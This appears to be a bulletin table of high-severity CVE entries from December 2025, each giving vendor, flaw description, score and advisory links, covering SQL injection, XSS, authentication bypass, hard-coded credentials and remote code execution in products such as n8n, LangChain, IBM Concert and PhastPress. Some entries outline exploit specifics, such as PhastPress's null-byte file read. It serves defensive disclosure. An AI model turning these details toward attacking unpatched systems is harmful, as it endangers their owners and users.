| Hitachi--Hitachi Infrastructure Analytics Advisor | Authorization bypass vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component) and Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component).This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00. | 2025-12-24 | 7.1 | CVE-2025-66445 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-133/index.html |
| Hotech Software Inc.--Otello | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Hotech Software Inc. Otello allows Stored XSS.This issue affects Otello: from 2.4.0 before 2.4.4. | 2025-12-23 | 7.3 | CVE-2025-13183 | https://www.usom.gov.tr/bildirim/tr-25-0476 |
| IBM--API Connect | IBM API Connect 10.0.8.0 through 10.0.8.5, and 10.0.11.0 could allow a remote attacker to bypass authentication mechanisms and gain unauthorized access to the application. | 2025-12-26 | 9.8 | CVE-2025-13915 | https://www.ibm.com/support/pages/node/7255149 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local user could overflow the buffer and execute arbitrary code on the system. | 2025-12-26 | 7.8 | CVE-2025-12771 | https://www.ibm.com/support/pages/node/7255549 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a local user to escalate their privileges due to a race condition of a symbolic link. | 2025-12-26 | 7.7 | CVE-2025-64645 | https://www.ibm.com/support/pages/node/7255549 |
| IdeaBox Creations--PowerPack Pro for Elementor | Missing Authorization vulnerability in IdeaBox Creations PowerPack Pro for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PowerPack Pro for Elementor: from n/a through 2.10.6. | 2025-12-23 | 7.5 | CVE-2024-24844 | https://vdp.patchstack.com/database/wordpress/plugin/powerpack-elements/vulnerability/wordpress-powerpack-pro-for-elementor-plugin-2-10-6-unauthenticated-plugin-settings-reset-vulnerability?_s_id=cve |
| InternLM--lmdeploy | LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1. | 2025-12-26 | 8.8 | CVE-2025-67729 | https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee |
| iSeeQ--Hybrid DVR WH-H4 | iSeeQ Hybrid DVR WH-H4 1.03R contains an unauthenticated vulnerability in the get_jpeg script that allows unauthorized access to live video streams. Attackers can retrieve video snapshots from specific camera channels by sending requests to the /cgi-bin/get_jpeg endpoint without authentication. | 2025-12-24 | 9.8 | CVE-2019-25236 | ExploitDB-47562 iSeeQ Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5539) |
| itsourcecode--Online Frozen Foods Ordering System | A vulnerability was determined in itsourcecode Online Frozen Foods Ordering System 1.0. This affects an unknown part of the file /contact_us.php. This manipulation of the argument Name causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-24 | 7.3 | CVE-2025-15073 | VDB-338330 | itsourcecode Online Frozen Foods Ordering System contact_us.php sql injection VDB-338330 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721321 | itsourcecode Online Frozen Foods Ordering System v1.0 SQL Injection https://github.com/24ggee/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Online Frozen Foods Ordering System | A vulnerability was identified in itsourcecode Online Frozen Foods Ordering System 1.0. This vulnerability affects unknown code of the file /customer_details.php. Such manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-12-25 | 7.3 | CVE-2025-15074 | VDB-338331 | itsourcecode Online Frozen Foods Ordering System customer_details.php sql injection VDB-338331 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721389 | itsourcecode Online Frozen Foods Ordering System v1.0 SQL Injection https://github.com/ttting888/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security flaw has been discovered in itsourcecode Student Management System 1.0. This affects an unknown part of the file /record.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-12-23 | 7.3 | CVE-2025-15034 | VDB-337747 | itsourcecode Student Management System record.php sql injection VDB-337747 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #720615 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/29 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security flaw has been discovered in itsourcecode Student Management System 1.0. This issue affects some unknown processing of the file /student_p.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-25 | 7.3 | CVE-2025-15075 | VDB-338332 | itsourcecode Student Management System student_p.php sql injection VDB-338332 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721406 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/30 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security vulnerability has been detected in itsourcecode Student Management System 1.0. The affected element is an unknown function of the file /form137.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2025-12-25 | 7.3 | CVE-2025-15077 | VDB-338334 | itsourcecode Student Management System form137.php sql injection VDB-338334 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721484 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/BUPT424201/CVE/issues/2 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was detected in itsourcecode Student Management System 1.0. The impacted element is an unknown function of the file /list_report.php. The manipulation of the argument sy results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2025-12-25 | 7.3 | CVE-2025-15078 | VDB-338335 | itsourcecode Student Management System list_report.php sql injection VDB-338335 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721485 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/BUPT424201/CVE/issues/3 https://itsourcecode.com/ |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry 6.4.8 contains an authenticated remote command injection vulnerability in pingTest.php and tcpPortTest.php scripts. Attackers can exploit unsanitized input parameters to inject and execute arbitrary shell commands with root privileges by manipulating the 'strInIP' and 'strInPort' parameters. | 2025-12-24 | 8.8 | CVE-2019-25243 | ExploitDB-47064 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5523) |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a critical authentication vulnerability with hard-coded SSH credentials for the wwwuser account. Attackers can leverage the insecure sudoers configuration to escalate privileges and gain root access by executing sudo commands without authentication. | 2025-12-24 | 7.5 | CVE-2019-25241 | ExploitDB-47067 Vendor Product Homepage Zero Science Lab Disclosure (ZSL-2019-5526) |
| jackq--XCMS | A flaw has been found in jackq XCMS up to 3fab5342cc509945a7ce1b8ec39d19f701b89261. This impacts an unknown function of the file Public/javascripts/admin/plupload-2.1.2/examples/upload.php. This manipulation causes unrestricted upload. It is possible to initiate the attack remotely. The exploit has been published and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-27 | 7.3 | CVE-2025-15109 | VDB-338480 | jackq XCMS upload.php unrestricted upload VDB-338480 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711696 | XCMS 1.0 Unrestricted Upload https://gitee.com/jackq/XCMS/issues/IDC4ZT |
| kermitproject--C-Kermit | C-Kermit (aka ckermit) through 10.0 Beta.12 (aka 416-beta12) before 244644d allows a remote Kermit system to overwrite files on the local system, or retrieve arbitrary files from the local system. | 2025-12-24 | 8.9 | CVE-2025-68920 | https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123025 https://github.com/KermitProject/ckermit/pull/20 https://www.kermitproject.org/ftp/kermit/test/tar/ https://www.complete.org/kermit/ |
| kiboit--PhastPress | The PhastPress plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read via null byte injection in all versions up to, and including, 3.7. This is due to a discrepancy between the extension validation in `getExtensionForURL()` which operates on URL-decoded paths, and `appendNormalized()` which strips everything after a null byte before constructing the filesystem path. This makes it possible for unauthenticated attackers to read arbitrary files from the webroot, including wp-config.php, by appending a double URL-encoded null byte (%2500) followed by an allowed extension (.txt) to the file path. | 2025-12-23 | 9.8 | CVE-2025-14388 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eec9bbc0-5a68-4624-a672-bd6227d6fa45?source=cve https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9641 https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9608 https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9570 https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9597 https://plugins.trac.wordpress.org/changeset/3418139 |
| KYOCERA Corporation--KYOCERA Net Admin | KYOCERA Net Admin 3.4.0906 contains an XML External Entity (XXE) injection vulnerability in the Multi-Set Template Editor that allows unauthenticated attackers to read arbitrary system files. Attackers can craft a malicious XML file with external entity references to retrieve sensitive configuration data like database credentials through an out-of-band channel attack. | 2025-12-24 | 7.5 | CVE-2019-25253 | ExploitDB-44430 Kyocera Official Website Zero Science Lab Disclosure (ZSL-2018-5459) |
| langchain-ai--langchain | LangChain is a framework for building agents and LLM-powered applications. Prior to versions 0.3.81 and 1.2.5, a serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data. This issue has been patched in versions 0.3.81 and 1.2.5. | 2025-12-23 | 9.3 | CVE-2025-68664 | https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm https://github.com/langchain-ai/langchain/pull/34455 https://github.com/langchain-ai/langchain/pull/34458 https://github.com/langchain-ai/langchain/commit/5ec0fa69de31bbe3d76e4cf9cd65a6accb8466c8 https://github.com/langchain-ai/langchain/commit/d9ec4c5cc78960abd37da79b0250f5642e6f0ce6 https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81 https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5 |
| langchain-ai--langchainjs | LangChain is a framework for building LLM-powered applications. Prior to @langchain/core versions 0.3.80 and 1.1.8, and prior to langchain versions 0.3.37 and 1.2.3, a serialization injection vulnerability exists in LangChain JS's toJSON() method (and subsequently when string-ifying objects using JSON.stringify(). The method did not escape objects with 'lc' keys when serializing free-form data in kwargs. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data. This issue has been patched in @langchain/core versions 0.3.80 and 1.1.8, and langchain versions 0.3.37 and 1.2.3 | 2025-12-23 | 8.6 | CVE-2025-68665 | https://github.com/langchain-ai/langchainjs/security/advisories/GHSA-r399-636x-v7f6 https://github.com/langchain-ai/langchainjs/commit/e5063f9c6e9989ea067dfdff39262b9e7b6aba62 https://github.com/langchain-ai/langchainjs/releases/tag/%40langchain%2Fcore%401.1.8 https://github.com/langchain-ai/langchainjs/releases/tag/langchain%401.2.3 |
| Leica Geosystems AG--GR10/GR25/GR30/GR50 GNSS | Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 contains a stored cross-site scripting vulnerability in the configuration file upload functionality. Attackers can upload a malicious HTML file to that executes arbitrary JavaScript in a user's browser session when viewed. | 2025-12-24 | 7.2 | CVE-2018-25131 | ExploitDB-46091 Leica Geosystems Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5503) |
| lemon8866--StreamVault | StreamVault is a video download integration solution. Prior to version 251126, a Remote Code Execution (RCE) vulnerability exists in the stream-vault application (SpiritApplication). The application allows administrators to configure yt-dlp arguments via the /admin/api/saveConfig endpoint without sufficient validation. These arguments are stored globally and subsequently used in YtDlpUtil.java when constructing the command line to execute yt-dlp. This issue has been patched in version 251126. | 2025-12-26 | 10 | CVE-2025-66203 | https://github.com/lemon8866/StreamVault/security/advisories/GHSA-c747-q388-3v6m https://github.com/lemon8866/StreamVault/releases/tag/251226 |
| LogicalDOC Srl--LogicalDOC Enterprise | LogicalDOC Enterprise 7.7.4 contains multiple post-authentication file disclosure vulnerabilities that allow attackers to read arbitrary files through unverified 'suffix' and 'fileVersion' parameters. Attackers can exploit directory traversal techniques in /thumbnail and /convertpdf endpoints to access sensitive system files like win.ini and /etc/passwd by manipulating path traversal sequences. | 2025-12-24 | 7.5 | CVE-2019-25258 | ExploitDB-44019 LogicalDOC Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5450) |
| luiswang--WebTareas | WebTareas 2.4 contains a file upload vulnerability that allows authenticated users to upload malicious PHP files through the chat photo upload functionality. Attackers can upload a PHP file with arbitrary code to the /files/Messages/ directory and execute it directly through the generated file path. | 2025-12-22 | 8.8 | CVE-2023-53971 | ExploitDB-51089 WebTareas Project Homepage VulnCheck Advisory: WebTareas 2.4 Authenticated Remote Code Execution via File Upload |
| luiswang--WebTareas | WebTareas 2.4 contains a SQL injection vulnerability in the webTareasSID cookie parameter that allows unauthenticated attackers to manipulate database queries. Attackers can exploit error-based and time-based blind SQL injection techniques to extract database information and potentially access sensitive system data. | 2025-12-22 | 7.5 | CVE-2023-53972 | ExploitDB-51087 WebTareas Project Homepage VulnCheck Advisory: WebTareas 2.4 Unauthenticated SQL Injection via Session Cookie Parameter |
| Mattermost--Mattermost | Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 with the Jira plugin enabled and Mattermost Jira plugin versions <=4.4.0 fail to enforce authentication and issue-key path restrictions in the Jira plugin, which allows an unauthenticated attacker who knows a valid user ID to issue authenticated GET and POST requests to the Jira server via crafted plugin payloads that spoof the user ID and inject arbitrary issue key paths. Mattermost Advisory ID: MMSA-2025-00555 | 2025-12-22 | 7.2 | CVE-2025-14273 | https://mattermost.com/security-updates |
| MegaSys Computer Technologies--Telenium Online Web Application | Telenium Online Web Application is vulnerable due to a Perl script that is called to load the login page. Due to improper input validation, an attacker can inject arbitrary Perl code through a crafted HTTP request, leading to remote code execution on the server. | 2025-12-24 | 9.8 | CVE-2025-8769 | https://megasys.com/support/ https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-04 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2024/icsa-24-263-04.json |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak | Microhard Systems IPn4G 1.1.0 contains a service vulnerability that allows authenticated users to enable a restricted SSH shell with a default 'msshc' user. Attackers can exploit a custom 'ping' command in the NcFTP environment to escape the restricted shell and execute commands with root privileges. | 2025-12-24 | 8.8 | CVE-2018-25143 | ExploitDB-45041 Microhard Systems Product Homepage Zero Science Lab Disclosure (ZSL-2018-5486) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials | Microhard Systems IPn4G 1.1.0 contains hardcoded default credentials that cannot be changed through normal gateway operations. Attackers can exploit these default credentials to gain unauthorized root-level access to the device by logging in with predefined username and password combinations. | 2025-12-24 | 7.5 | CVE-2018-25147 | ExploitDB-45040 Microhard Systems Product Homepage Zero Science Lab Disclosure (ZSL-2018-5480) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit | Microhard Systems IPn4G 1.1.0 contains multiple authenticated remote code execution vulnerabilities in the admin interface that allow attackers to create crontab jobs and modify system startup scripts. Attackers can exploit hidden admin features to execute arbitrary commands with root privileges, including starting services, disabling firewalls, and writing files to the system. | 2025-12-24 | 8.8 | CVE-2018-25148 | ExploitDB-45038 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5479) |
| Mitsubishi Electric Europe--smartRTU | A remote unauthenticated attacker may be able to bypass authentication by utilizing a specific API route to execute arbitrary OS commands. | 2025-12-24 | 7.5 | CVE-2025-3232 | https://emea.mitsubishielectric.com/fa/products/quality/quality-news-information https://www.cisa.gov/news-events/ics-advisories/icsa-25-105-09 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-105-09.json |
| Mybb--MyBB | MyBB 1.8.32 contains a chained vulnerability that allows authenticated administrators to bypass avatar upload restrictions and execute arbitrary code. Attackers can modify upload path settings, upload a malicious PHP-embedded image file, and execute commands through the language configuration editing interface. | 2025-12-22 | 8.8 | CVE-2023-53979 | ExploitDB-51213 Official MyBB Vendor Homepage Researcher Disclosure VulnCheck Advisory: MyBB 1.8.32 Authenticated Remote Code Execution via Chained Vulnerabilities |
| Keycloak--Keycloak | A flaw was found in Keycloak. This vulnerability allows an unauthenticated remote attacker to cause a denial of service (DoS) by repeatedly initiating TLS 1.2 client-initiated renegotiation requests to exhaust server CPU resources, making the service unavailable. | 2025-12-23 | 7.5 | CVE-2025-11419 | RHSA-2025:18254 RHSA-2025:18255 RHSA-2025:18889 RHSA-2025:18890 https://access.redhat.com/security/cve/CVE-2025-11419 RHBZ#2402142 |
| PuneethReddyHC--PuneethReddyHC event-management 1.0 | Improper input handling in /Grocery/search_products_itname.php inPuneethReddyHC event-management 1.0 permits SQL injection via the sitem_name POST parameter. Crafted payloads can alter query logic and disclose database contents. Exploitation may result in sensitive data disclosure and backend compromise. | 2025-12-23 | 9.8 | CVE-2025-65354 | https://www.notion.so/JD-Cloud-Unauth-RCE-2d22b76e8e0c802c975bf186b208d0c2 |
| n8n-io--n8n | n8n is an open source workflow automation platform. From version 1.0.0 to before 2.0.0, a sandbox bypass vulnerability exists in the Python Code Node that uses Pyodide. An authenticated user with permission to create or modify workflows can exploit this vulnerability to execute arbitrary commands on the host system running n8n, using the same privileges as the n8n process. This issue has been patched in version 2.0.0. Workarounds for this issue involve disabling the Code Node by setting the environment variable NODES_EXCLUDE: "[\"n8n-nodes-base.code\"]", disabling Python support in the Code node by setting the environment variable N8N_PYTHON_ENABLED=false, which was introduced in n8n version 1.104.0, and configuring n8n to use the task runner based Python sandbox via the N8N_RUNNERS_ENABLED and N8N_NATIVE_PYTHON_RUNNER environment variables. | 2025-12-26 | 9.9 | CVE-2025-68668 | https://github.com/n8n-io/n8n/security/advisories/GHSA-62r4-hw23-cc8v |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to version 1.114.0, a stored Cross-Site Scripting (XSS) vulnerability may occur in n8n when using the "Respond to Webhook" node. When this node responds with HTML content containing executable scripts, the payload may execute directly in the top-level window, rather than within the expected sandbox introduced in version 1.103.0. This behavior can enable a malicious actor with workflow creation permissions to execute arbitrary JavaScript in the context of the n8n editor interface. This issue has been patched in version 1.114.0. Workarounds for this issue involve restricting workflow creation and modification privileges to trusted users only, avoiding use of untrusted HTML responses in the "Respond to Webhook" node, and using an external reverse proxy or HTML sanitizer to filter responses that include executable scripts. | 2025-12-26 | 7.3 | CVE-2025-61914 | https://github.com/n8n-io/n8n/security/advisories/GHSA-58jc-rcg5-95f3 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to version 2.0.0, in self-hosted n8n instances where the Code node runs in legacy (non-task-runner) JavaScript execution mode, authenticated users with workflow editing access can invoke internal helper functions from within the Code node. This allows a workflow editor to perform actions on the n8n host with the same privileges as the n8n process, including: reading files from the host filesystem (subject to any file-access restrictions configured on the instance and OS/container permissions), and writing files to the host filesystem (subject to the same restrictions). This issue has been patched in version 2.0.0. Workarounds for this issue involve limiting file operations by setting N8N_RESTRICT_FILE_ACCESS_TO to a dedicated directory (e.g., ~/.n8n-files) and ensure it contains no sensitive data, keeping N8N_BLOCK_FILE_ACCESS_TO_N8N_FILES=true (default) to block access to .n8n and user-defined config files, and disabling high-risk nodes (including the Code node) using NODES_EXCLUDE if workflow editors are not fully trusted. | 2025-12-26 | 7.1 | CVE-2025-68697 | https://github.com/n8n-io/n8n/security/advisories/GHSA-j4p8-h8mh-rh8q |
| nanbingxyz--5ire | 5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. In versions 0.15.2 and prior, an RCE vulnerability exists in useMarkdown.ts, where the markdown-it-mermaid plugin is initialized with securityLevel: 'loose'. This configuration explicitly permits the rendering of HTML tags within Mermaid diagram nodes. This issue has not been patched at time of publication. | 2025-12-23 | 9.7 | CVE-2025-68669 | https://github.com/nanbingxyz/5ire/security/advisories/GHSA-5hpf-p8fw-j349 https://github.com/nanbingxyz/5ire/blob/c40d05a2b546094789fc727daa5383bb15034442/src/hooks/useMarkdown.ts#L156 https://github.com/nanbingxyz/5ire/releases/tag/v0.15.2 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an Edge Messaging Platform. Prior to version 0.24.2, there is a classical data racing issue about sub info list which could result in heap use after free crash. This issue has been patched in version 0.24.2. | 2025-12-27 | 7.5 | CVE-2025-59946 | https://github.com/nanomq/nanomq/security/advisories/GHSA-xg37-23w7-72p5 https://github.com/nanomq/nanomq/issues/1863 |
| net-snmp--net-snmp | net-snmp is a SNMP application library, tools and daemon. Prior to versions 5.9.5 and 5.10.pre2, a specially crafted packet to an net-snmp snmptrapd daemon can cause a buffer overflow and the daemon to crash. This issue has been patched in versions 5.9.5 and 5.10.pre2. | 2025-12-22 | 9.8 | CVE-2025-68615 | https://github.com/net-snmp/net-snmp/security/advisories/GHSA-4389-rwqf-q9gq |
| NetBT Consulting Services Inc.--e-Fatura | Unquoted Search Path or Element vulnerability in NetBT Consulting Services Inc. E-Fatura allows Leveraging/Manipulating Configuration File Search Paths, Redirect Access to Libraries.This issue affects e-Fatura: before 1.2.15. | 2025-12-22 | 7.3 | CVE-2025-14018 | https://www.usom.gov.tr/bildirim/tr-25-0474 |
| NovaRad Corporation--NovaPACS Diagnostics Viewer | NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel attack. | 2025-12-24 | 9.8 | CVE-2018-25142 | ExploitDB-45337 NovaRad Corporation Product Homepage Zero Science Lab Disclosure (ZSL-2018-5488) |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable contains a vulnerability where an attacker could exploit a hard-coded credential issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, and data tampering. | 2025-12-23 | 9.8 | CVE-2025-33222 | https://nvd.nist.gov/vuln/detail/CVE-2025-33222 https://www.cve.org/CVERecord?id=CVE-2025-33222 https://nvidia.custhelp.com/app/answers/detail/a_id/5749 |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable contains a vulnerability where an attacker could cause an execution with unnecessary privileges. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure and data tampering. | 2025-12-23 | 9.8 | CVE-2025-33223 | https://nvd.nist.gov/vuln/detail/CVE-2025-33223 https://www.cve.org/CVERecord?id=CVE-2025-33223 https://nvidia.custhelp.com/app/answers/detail/a_id/5749 |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable contains a vulnerability where an attacker could cause an execution with unnecessary privileges. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure and data tampering. | 2025-12-23 | 9.8 | CVE-2025-33224 | https://nvd.nist.gov/vuln/detail/CVE-2025-33224 https://www.cve.org/CVERecord?id=CVE-2025-33224 https://nvidia.custhelp.com/app/answers/detail/a_id/5749 |
| OpenOps--OpenOps | OpenOps before 0.6.11 allows remote code execution in the Terraform block. | 2025-12-24 | 7.4 | CVE-2025-68922 | https://github.com/openops-cloud/openops/pull/1767 https://linear.app/openops/issue/OPS-3254 https://github.com/openops-cloud/openops/releases/tag/0.6.11 https://github.com/openops-cloud/openops/compare/0.6.10...0.6.11 |
| Orangescrum--orangescrum | Orangescrum 1.8.0 contains a privilege escalation vulnerability that allows authenticated users to take over other project-assigned accounts by manipulating session cookies. Attackers can extract the victim's unique ID from the page source and replace their own session cookie to gain unauthorized access to another user's account. | 2025-12-23 | 8.8 | CVE-2021-47721 | ExploitDB-50551 Official Product Homepage VulnCheck Advisory: Orangescrum 1.8.0 Authenticated Privilege Escalation via User Session Manipulation |
| Orangescrum--orangescrum | Orangescrum 1.8.0 contains an authenticated SQL injection vulnerability that allows authorized users to manipulate database queries through multiple vulnerable parameters. Attackers can inject malicious SQL code into parameters like old_project_id, project_id, uuid, and uniqid to potentially extract or modify database information. | 2025-12-23 | 7.1 | CVE-2021-47720 | ExploitDB-50553 Official Product Homepage VulnCheck Advisory: Orangescrum 1.8.0 Authenticated SQL Injection via Multiple Parameters |
| Pexip--Infinity | Pexip Infinity 15.0 through 38.0 before 38.1 has Improper Access Control in the Secure Scheduler for Exchange service, when used with Office 365 Legacy Exchange Tokens. This allows a remote attacker to read potentially sensitive data and excessively consume resources, leading to a denial of service. | 2025-12-25 | 8.2 | CVE-2025-59683 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity before 37.0 has improper input validation in signalling that allows a remote attacker to trigger a software abort via a crafted signalling message, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-32095 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 33.0 through 37.0 before 37.1 has improper input validation in signaling that allows an attacker to trigger a software abort, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-32096 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 35.0 through 37.2 before 38.0 has Improper Input Validation in signalling that allows an attacker to trigger a software abort, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-48704 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity before 39.0 has Missing Authentication for a Critical Function in a product-internal API, allowing an attacker (who already has access to execute code on one node within a Pexip Infinity installation) to impact the operation of other nodes within the installation. | 2025-12-25 | 7.5 | CVE-2025-66377 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity before 39.0 has Improper Input Validation in the media implementation, allowing a remote attacker to trigger a software abort via a crafted media stream, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-66379 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 35.0 through 38.1 before 39.0, in non-default configurations that use Direct Media for WebRTC, has Improper Input Validation in signalling that allows an attacker to trigger a software abort, resulting in a temporary denial of service. | 2025-12-25 | 7.5 | CVE-2025-66443 | https://docs.pexip.com/admin/security_bulletins.htm |
| ProjectSend--projectSend | ProjectSend r1605 contains a remote code execution vulnerability that allows attackers to upload malicious files by manipulating file extensions. Attackers can upload shell scripts with disguised extensions through the upload.process.php endpoint to execute arbitrary commands on the server. | 2025-12-22 | 9.8 | CVE-2023-53980 | ExploitDB-51238 Official Product Homepage VulnCheck Advisory: ProjectSend r1605 Remote Code Execution via File Extension Manipulation |
| Ragic--Enterprise Cloud Database | Enterprise Cloud Database developed by Ragic has a Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information and log into the system as any user. | 2025-12-22 | 9.8 | CVE-2025-15016 | https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html |
| Ragic--Enterprise Cloud Database | Enterprise Cloud Database developed by Ragic has a Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to download arbitrary system files. | 2025-12-22 | 7.5 | CVE-2025-15015 | https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html |
| Riello--NetMan | Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/certsupload.cgi /../ directory traversal for file upload with resultant code execution. | 2025-12-24 | 9.1 | CVE-2025-68916 | https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025 |
| Rifatron Co., Ltd.--DVR | Rifatron 5brid DVR contains an unauthenticated vulnerability in the animate.cgi script that allows unauthorized access to live video streams. Attackers can exploit the Mobile Web Viewer module by specifying channel numbers to retrieve sequential video snapshots without authentication. | 2025-12-24 | 9.8 | CVE-2019-25240 | ExploitDB-47368 Rifatron Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5532) |
| Ross Video Ltd.--DashBoard | Ross Video DashBoard 8.5.1 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files due to improper permission settings. Attackers can exploit the 'M' or 'C' flags for 'Authenticated Users' group to replace the DashBoard.exe binary with a malicious executable. | 2025-12-24 | 8.8 | CVE-2019-25245 | ExploitDB-46742 Ross Video Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5516) |
| Ruben Garcia--AutomatorWP | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ruben Garcia AutomatorWP allows SQL Injection.This issue affects AutomatorWP: from n/a through 5.2.4. | 2025-12-23 | 7.6 | CVE-2025-68561 | https://vdp.patchstack.com/database/wordpress/plugin/automatorwp/vulnerability/wordpress-automatorwp-plugin-5-2-4-sql-injection-vulnerability?_s_id=cve |
